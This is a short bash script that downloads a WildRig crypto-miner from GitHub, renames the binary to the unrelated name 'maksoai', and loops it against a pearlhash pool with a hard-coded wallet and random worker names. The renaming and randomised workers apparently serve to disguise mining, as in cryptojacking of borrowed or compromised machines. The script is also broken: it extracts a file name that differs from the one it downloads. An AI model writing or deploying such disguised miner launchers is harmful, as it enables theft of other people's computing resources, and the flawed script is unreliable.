#!/bin/bash
wget https://github.com/andru-kun/wildrig-multi/releases/download/0.51.4/wildrig-multi-linux-0.51.4.tar.gz
tar xf wildrig-multi-hiveos-0.51.4.tar.gz
mv wildrig-multi maksoai
while true; do
./maksoai --algo pearlhash --url pool.pearlhash.xyz:9000 --user prl1plfe52vv5jxq8x4zj0vn6u0wufa73q2xmzed87nelwyg3mlxhfl8sn6hhdr --worker $(echo $RANDOM | md5sum | head -c 10)
done
